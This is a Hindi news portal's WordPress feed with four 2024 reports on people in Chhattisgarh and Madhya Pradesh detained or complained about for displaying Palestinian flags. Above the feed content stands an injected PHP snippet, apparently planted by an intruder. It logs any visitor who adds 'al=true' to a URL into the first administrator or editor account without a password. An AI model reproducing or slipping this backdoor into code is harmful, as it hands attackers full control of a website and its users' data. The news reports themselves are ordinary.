// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Palestine flag – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 18 Sep 2024 14:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-बिलासपुर में सड़क पर लगाया फलस्तीन का झंडा, हिंदू संगठनों ने किया हंगामा https://pratyushaashakinayikiran.com/?p=72053 Wed, 18 Sep 2024 14:26:00 +0000 https://pratyushaashakinayikiran.com/?p=72053 बिलासपुर.

बिलासपुर के तारबहार थाना क्षेत्र में फलस्तीन का झंडा लहराने का वीडियो वायरल हुआ था। जिसको लेकर मंगलवार की शाम हिन्दू संगठनों ने तारबहार थाने का घेराव कर फलस्तीन का झंडा लहराने वालों पर कार्रवाई की मांग की। पुलिस ने पांच लोगों को हिरासत में लिया है। दरअसल, जहां एक तरफ सोमवार को पूरे देश में जश्न मनाया का माहौल था।

तो वहीं छत्तीसगढ के बिलासपुर में तारबहार थाना क्षेत्र के अंतर्गत आने वाली सड़क पर कुछ अज्ञात लोगों ने फलस्तीन का झंडा लगा दिया। इसका वीडियो वायरल हुआ तब एक व्यक्ति ने पुलिस में शिकायत की। पुलिस ने तत्काल मौके पर पहुंचकर फलस्तीन झंडे की तरह लगे हुए झंडों को उतरवाया और जांच पड़ताल शुरू की।

]]>
मंडला और बालाघाट में ईद-ए-मिलाद के जुलूस के दौरान ‘फिलिस्तीनी झंडे’ लहराने के लिए मामले दर्ज किए गए https://pratyushaashakinayikiran.com/?p=71695 Tue, 17 Sep 2024 15:56:00 +0000 https://pratyushaashakinayikiran.com/?p=71695 मंडला / बालाघाट

ईद-ए-मिलाद के मौके पर निकाले गए जुलूस के दौरान कथित तौर पर मध्य प्रदेश के दो जिलों में फिलिस्तीन का झंडा लहराने की खबर सामने आ रही है. पुलिस ने इस मामले में कुछ लोगों को भी गिरफ्तार कर लिया है.

पुलिस ने कहा कि सोमवार को मध्य प्रदेश के मंडला और बालाघाट जिलों में ईद-ए-मिलाद जुलूस के दौरान कथित तौर पर 'फिलिस्तीनी झंडे' लहराने के लिए अलग-अलग मामले दर्ज किए गए, जिसके कारण कुछ लोगों की गिरफ्तारी हुई.

पुलिस ने कहा कि राजगढ़ में फिलिस्तीन समर्थक नारे लगाने के आरोप की बिना सबूत के पुष्टि नहीं की जा सकती. मंडला में एक युवक ने कथित तौर पर ईद-ए-मिलाद-उन-नबी जुलूस के दौरान चिलमन स्क्वायर पर फिलिस्तीन का झंडा लहराया.

मंडला के पुलिस अधीक्षक रजत सकलेचा ने कहा, "फिलिस्तीन के झंडे जैसा झंडा लहराने की शिकायतों के आधार पर आरोपी युवक को हिरासत में ले लिया गया है और आगे कानूनी कदम उठाए जा रहे हैं."

'BNS की धारा के तहत आरोपियों पर मामला दर्ज'

मंडला कोतवाली पुलिस थाना प्रभारी शफीक खान ने कहा कि आरोपी की पहचान फरदीन और अन्य के रूप में हुई है, जिसे भारतीय न्याय संहिता (बीएनएस) की धारा 197 (2) के तहत गिरफ्तार किया गया है.

एक प्रेस विज्ञप्ति में कहा गया है कि बालाघाट शहर में पुलिस को एक शिकायत दर्ज की गई थी, जिसमें दावा किया गया था कि महावीर चौक पर ईद-ए-मिलाद जुलूस के दौरान एक व्यक्ति और उसके साथियों  ने फिलिस्तीन का झंडा लहराया था. शिकायतकर्ता ने कहा कि इस कृत्य से भारतीयों की भावनाएं आहत हुई हैं और इससे समाज में वैमनस्यता फैल सकती है.

विज्ञप्ति के अनुसार, पुलिस ने शाकिब और अन्य अज्ञात व्यक्तियों के खिलाफ बीएनएस धारा 197 (2) के तहत मामला दर्ज कर लिया है. दोनों ही घटनाओं में आगे की कानूनी कार्रवाई की जा रही है.

पुलिस ने की CCTV फुटेज की जांच

राजगढ़ के पुलिस अधीक्षक आदित्य मिश्रा ने ईद-ए-मिलाद जुलूस के दौरान कथित तौर पर फिलिस्तीन समर्थक नारे लगाए जाने के खिलाफ शिकायत मिलने की पुष्टि की. उन्होंने कहा कि पुलिस ने सीसीटीवी कैमरे के फुटेज की जांच की, लेकिन कोई सबूत नहीं मिला. उन्होंने कहा कि आगे की जांच जारी है.

 

]]>
भोपाल में लेडीज टेलर ने दुकान के बाहर लगाया फिलिस्तीन का झंडा, पहुंचा हवालात https://pratyushaashakinayikiran.com/?p=60989 Fri, 16 Aug 2024 15:46:00 +0000 https://pratyushaashakinayikiran.com/?p=60989 भोपाल
15 अगस्त को जहां एक ओर पूरा देश 78वें स्वतंत्रता दिवस के जश्न में डूबा था और जगह-जगह लोग तिरंगा लहराकर लोग अपनी खुशी का इज़हार कर रहे थे, तो वहीं मध्य प्रदेश की राजधानी भोपाल के गौतम नगर में एक शख्स ने अपनी दुकान के बाहर फिलिस्तीन का झंडा लगा दिया. इस पर विवाद हुआ तो पुलिस ने झंडा उतरवाया और युवक को हिरासत में ले लिया.

गौतम नगर थाना प्रभारी नरेंद्र सिंह ठाकुर ने बताया कि स्थानीय लोगों ने सूचना दी थी कि न्यू फैशन लेडीज़ टेलर नाम से दुकान चलाने वाले हनीफ नाम के शख्स ने अपनी दुकान के बाहर राष्ट्रीय ध्वज तिरंगा के साथ ही दुकान की दूसरी तरफ फिलिस्तीन का झंडा लगा रखा है.

सूचना मिलने पर दो पुलिसकर्मियों को लोकेशन पर भेजा तो सूचना सही पाई गई. मौके पर पुलिसकर्मियों ने पहले तो फिलिस्तीन का झंडा उतरवाया, फिर हनीफ को हिरासत में ले लिया गया. वहीं, फिलिस्तीन के झंडे को भी जब्त कर लिया गया है.

थाना प्रभारी के मुताबिक, युवक से पूछताछ के दौरान यह पता लगाने की कोशिश की जा रही है कि उसने फिलिस्तीन का झंडा लगाने का फैसला खुद लिया था या किसी के कहने पर उसने यह झंडा लगाया था.

 

]]>
मजार से कपड़ा लाकर घर पर सिला था फलस्तीन का झंडा, मोहर्रम के जुलूस में लहराया , हिंदू संगठन ने कार्रवाई की मांग की https://pratyushaashakinayikiran.com/?p=52941 Fri, 19 Jul 2024 22:25:00 +0000 https://pratyushaashakinayikiran.com/?p=52941 राजगढ़
इजराइल व फलस्तीन के बीच चल रहे विवाद की रील इंस्ट्राग्राम पर देखी। इसके बाद फलस्तीन से प्रेरित हुआ और मजार से कपड़ा लेकर आया। कुछ कपड़ा बाजार से लाया व फिर घर पर ही फलस्तीन का झंडा सिल लिया था। इसके बाद उसे मोहर्रम के जुलूस के दौरान डीजे पर चढकर लहरा दिया था। यह कहना है नरसिंहगढ़ में फलस्तीन का झंडा लहराने वाले 15 वर्षीय नाबालिग का। इसके साथ ही उसकी काउंसलिंग की जा रही है। हालांकि अभी तक कोई कानूनी कार्रवाई नहीं की गई है।

जब यह घटना हुई तब जुलूस में मौजूद लोगों ने ध्यान नहीं दिया, लेकिन कुछ समय बाद उसका वीडियो सामने आ गया। इसके बाद हिंदू संगठन के लोगों ने ऐसा करने वाले के खिलाफ कार्रवाई की मांग की। नरसिंहगढ़ पुलिस ने संबंधित की पहचान 15 वर्षीय नाबालिग के रूप में की है। इसके बाद उसे थाने लाकर बैठा लिया था व पूछताछ की जा रही थी। युवक के पिता को भी थाने बुलाया था। परिवार की भी हिस्ट्री खंगाली जा रही थी।

पूछताछ में बताया फलस्तीन व इजराइल विवाद की ढेरों रीलें देखता था
15 वर्षीय नाबालिग ने पूछताछ के दौरान पुलिस को बताया कि इजराइल व फलस्तीन के बीच में जो विवाद चल रहा है उसकी कई रीलें बनी हैं। इंस्टाटाग्राम सहित इंटरनेट मीडिया पर फलस्तीन व इजराइल विवाद की रीलें देखता था। फलस्तीन को लेकर ढेर रीलें इंटरनेट मीडिया पर भरी पड़ी है। रीलें देखने के बाद ही प्रेरित हुआ। इसके बाद एक कपड़ा मजार से उठाकर लाया। बाकी के कपड़े बाजार से खरीदी थे। इसके बाद घर पर ही खुद ने फलस्तीन की झंडा सिला था। जिसे डीजे पर मोहर्रम के जुलूस के दौरान लहरा दिया था।

नाबालिग की कर रहे काउंसलिंग
पुलिस के मुताबिक फलस्‍तीन का झंडा फहराने वाले नाबालिग की काउंसलिंग की जा रही है।
काउंसलिंग के लिए उसे राजगढ पहुंचाया गया है। ताकि उससे पूछताछ की जा सके।
बच्चे से पूछताछ के बाद ही अब इस मामले में बहुत हद तक तस्वीर साफ हो सकती है।
साथ ही पुलिस द्वारा जरूरत लगने पर उनके पिता को भी थाने बुला रही है।
पूछताछ करने के बाद वापस भेज देती है। फिलहाल पुलिस जांच में जुटी हुई है।
पुलिस को अंदेशा है कि इसके पीछे कहीं कोई और लोग भी शामिल तो नहीं हैं।

]]>